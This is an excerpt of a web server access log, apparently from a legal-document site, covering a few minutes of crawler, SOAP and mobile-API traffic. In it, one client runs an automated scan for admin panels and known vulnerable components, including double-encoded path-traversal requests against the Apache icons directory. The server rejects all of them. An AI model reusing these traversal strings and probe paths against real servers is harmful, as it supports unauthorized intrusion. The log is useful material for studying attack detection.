66.249.77.165 - - [03/Jul/2024:08:18:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1587.pdf HTTP/1.1" 200 435128
172.22.2.4 - - [03/Jul/2024:08:17:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:08:19:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39813
216.245.221.92 - - [03/Jul/2024:08:19:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Jul/2024:08:17:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [03/Jul/2024:08:19:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.77.164 - - [03/Jul/2024:08:19:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%20951-1000/00000997.tif HTTP/1.1" 200 1008950
201.245.192.253 - - [03/Jul/2024:08:19:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33489
201.245.192.253 - - [03/Jul/2024:08:20:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [03/Jul/2024:08:20:24 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [03/Jul/2024:08:20:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [03/Jul/2024:08:20:40 -0500] "GET /BLA/boletinlegal/manager/html HTTP/1.1" 404 1018
186.155.18.159 - - [03/Jul/2024:08:20:43 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2011%2F HTTP/1.1" 200 638898
45.156.129.125 - - [03/Jul/2024:08:21:28 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [03/Jul/2024:08:21:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
45.156.129.125 - - [03/Jul/2024:08:21:44 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1018
45.156.129.125 - - [03/Jul/2024:08:21:56 -0500] "GET / HTTP/1.1" 200 319
45.156.129.125 - - [03/Jul/2024:08:21:56 -0500] "GET /sugar_version.json HTTP/1.1" 404 1018
201.245.192.253 - - [03/Jul/2024:08:22:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
45.156.129.125 - - [03/Jul/2024:08:22:10 -0500] "GET /identity HTTP/1.1" 404 1018
45.156.129.125 - - [03/Jul/2024:08:22:21 -0500] "GET /zabbix/favicon.ico HTTP/1.1" 404 1018
45.156.129.125 - - [03/Jul/2024:08:22:29 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [03/Jul/2024:08:22:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
45.156.129.125 - - [03/Jul/2024:08:22:40 -0500] "GET / HTTP/1.1" 200 319
45.156.129.125 - - [03/Jul/2024:08:22:40 -0500] "HEAD /icons/sphere1.png HTTP/1.1" 200 -
45.156.129.125 - - [03/Jul/2024:08:22:40 -0500] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1" 400 -
45.156.129.125 - - [03/Jul/2024:08:22:41 -0500] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1" 400 -
45.156.129.125 - - [03/Jul/2024:08:22:41 -0500] "HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1" 400 -
45.156.129.125 - - [03/Jul/2024:08:22:41 -0500] "GET /js/NewWindow_2_all.js HTTP/1.1" 404 1018
45.156.129.125 - - [03/Jul/2024:08:22:41 -0500] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 1018
45.156.129.125 - - [03/Jul/2024:08:22:42 -0500] "GET /favicon-32x32.png HTTP/1.1" 404 1018
45.156.129.125 - - [03/Jul/2024:08:22:42 -0500] "GET /webfig/ HTTP/1.1" 404 1018
45.156.129.125 - - [03/Jul/2024:08:22:48 -0500] "GET /static/historypage.js HTTP/1.1" 404 1018
45.156.129.125 - - [03/Jul/2024:08:22:53 -0500] "GET /WebInterface/ HTTP/1.1" 404 1018
45.156.129.125 - - [03/Jul/2024:08:22:57 -0500] "GET / HTTP/1.1" 200 319
45.156.129.125 - - [03/Jul/2024:08:22:57 -0500] "GET /showLogin.cc HTTP/1.1" 404 1018
45.156.129.125 - - [03/Jul/2024:08:23:01 -0500] "GET /index.jsp HTTP/1.1" 404 1018
45.156.129.125 - - [03/Jul/2024:08:23:03 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
45.156.129.125 - - [03/Jul/2024:08:23:04 -0500] "GET /admin/ HTTP/1.1" 404 1018
45.156.129.125 - - [03/Jul/2024:08:23:04 -0500] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 1018
45.156.129.125 - - [03/Jul/2024:08:23:07 -0500] "GET /solr/ HTTP/1.1" 404 1018
45.156.129.125 - - [03/Jul/2024:08:23:08 -0500] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 1018
201.245.192.253 - - [03/Jul/2024:08:23:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38894
45.156.129.125 - - [03/Jul/2024:08:23:13 -0500] "GET /api/session/properties HTTP/1.1" 404 1018
45.156.129.125 - - [03/Jul/2024:08:23:14 -0500] "GET /ext-js/app/common/zld_product_spec.js HTTP/1.1" 404 1018
186.102.90.51 - - [03/Jul/2024:08:23:29 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+zZxcvC6wC9PtX/EyrH+kNXfFuZ6ZUEaSEVfu46jCmnb6TSy1P1N3tkqM4Q3SZyjF1kNkK9BYo1w==&y=U2FsdGVkX1+obTRe2gg8SmRzRh+SgBgkC3fq9pb37/Ymi/Z+oPTp16jsKcMcTXrZ HTTP/1.1" 200 30
186.102.90.51 - - [03/Jul/2024:08:23:29 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18zUIxEDGOlynDzYojXGMgiX5B/LxzUDUUdNm4WDD35fIhaIEvjDvLIL51RLvNop1Xgf9R9hh4QVEiVDkrCu3483scGwiEofdI=&u=U2FsdGVkX1/6FGF6Lc3m6+iomFl+cwH5JcVmc0tFCXk5qsOCKNIaT4Q2O73OSY/j&y=U2FsdGVkX1+obTRe2gg8SmRzRh+SgBgkC3fq9pb37/Ymi/Z+oPTp16jsKcMcTXrZ HTTP/1.1" 200 97
186.102.90.51 - - [03/Jul/2024:08:23:29 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18BEzUrPmZ6ewlDeo9E4sdVgwJNSWdbWS8cHi5o4t1zu/spywj5LkKEYl0C46piYdKfXPjf7wX97hkLcw85m/Oo/Y64fmKTizb0BCFfVhr+IpvCQdt6Y2AyIDVRDkxHD99CKEGtt8mSDwpBFc0a2+N6pWvgTLPANvIpc3KjFy3yBlQyOjURf7GfzWx4IqBFQehJM3XDN2tFe9fLMi7RbZgSx+LOK/HFeXhasT4GgSc2FN27P2lS6k++uX4QwcELnrLnyvMwoJunvlRaCqUiT8KedmIJzLrN0B0wE1JdKL0cjOr44WTTqbhWr1SnFAq6mwhRbqqHs5ZMtalRaRM9hx5KQCQQjnmMXmIvD4a03qJPiIM5dbSotM3NkG1xyZOuP7xwioIzuBGLWueTlrWzJqwL5TTP6mtmKz4JpsGeSiQNvSOZQakLL690LwxxU8sRntDyTsL/IVitdzQ2BX3k0/2Nv9wTiboP/HGCFTbEZoXaZScXUckxVQPW7TcDuoFRBtHZ8qqpLwHg4BBWpefeWi3S708qgkAUhhYh9GJgJbLY73S8eki5eCMXb4Si+o0nouEDKVTDbIGiyaqB1e7N+6hUW34nhAIN+MLu3qmOUwnQyHF9b2HbvvMFDqus/9DVIljkGuw6SoFfpZC/MdCz9KLr+2eei12mD/XHwU65Y3Q25TuvMQmqpU+LmS58Twdh00J17YRSIG2LiYrKz0FLWd8+GdCphddH8cZ7lq6c4IhfTobutXcjnil/9dgvcUkhF7HbVJ9EiQP8P/FjJXB/Gw5nfzDhAvDK+jI5cNrsGTA/2NRGM7CZeREr9IE+Xvgivc5jfu+30q9q47CiJ6RKEoGqWEltSFbyAEhRL5F9p67bpD/a8jO2MZdLTkT9alGIPpeMSyxoznUfc9peaHKIeXx/loQJH8oN0qU2+G5mOtshkqwRJQXBTZxyMhOZBemxtLHDOiWR7HrUiTPJaPgsYQ9/pj16FrApMNrjzTNaIKOu3viq+UryExTBHo7inAYE35BdbVmtb+F6PIjfrLzwqL5XMWvGZ16p4Z4jwdSKbX0cXHQ00GiRGsePvukOpLc4o8oUvIkh5TVLxepg/CV70cijQKxOU2grE4aIxYYlI8JO2JnNba3zcQ0GJnJx9Q/8kFSLVelN5IJPY0uFBvnCcLNHwdPBEQgOu/XYPiljvBoV7+1FsfHhLBLu2HqsdoxQH7ZkMlZyTXgVenr/O5/5eRngpyEIUsVQki/0vXsq1igiJ8LNSLLmfbkluCRqFpk4fQt486DWfmdB/pt4Fcnwo9vpCPZfe1rnEttMgqWUDbNchjRH0pv2jw8IZOths1Fsr8gJs9qc8H+fURc6J9+v9WOif4NNNwZ0C/+XF+A9/4FVGtQT9Q5e6SGzHluHIR1s9UfAR9dYEGA73TpeV6xb3+4wu0FqJ3CYnMy6tIApiycEU818yH1yKF8HF6uIjIjAkIgMjDw4PNrGlK9J4an+RS/hwvj9ydUhtDq0CvVxCA04xZKlnfE5E9xjXFIkOOtFNBzd/hRxkSDVCmTunAv2leUOYyRPUaHoHsVe4uw1qX5wppFSWrt/IOpMhczNmkpoSv6h90b4KYGz6zKp+Qtl0ac0um2YBLXgQNYT8YvtTPD92RTNQbxfA8lw/dP2aqi7DuMtYUuqkn3ZhU2KrVCCQ9lFrGflcpC1JtB/cyE13hApbTvRxUxo0PSsSAl34kdD0V2sc3PadkI+fRMLKY+rsPufVibBxkJ4bJlvzULUxmpTROQZVVZLVi8Y&u=U2FsdGVkX1/6FGF6Lc3m6+iomFl+cwH5JcVmc0tFCXk5qsOCKNIaT4Q2O73OSY/j&y=U2FsdGVkX1+obTRe2gg8SmRzRh+SgBgkC3fq9pb37/Ymi/Z+oPTp16jsKcMcTXrZ HTTP/1.1" 200 2187
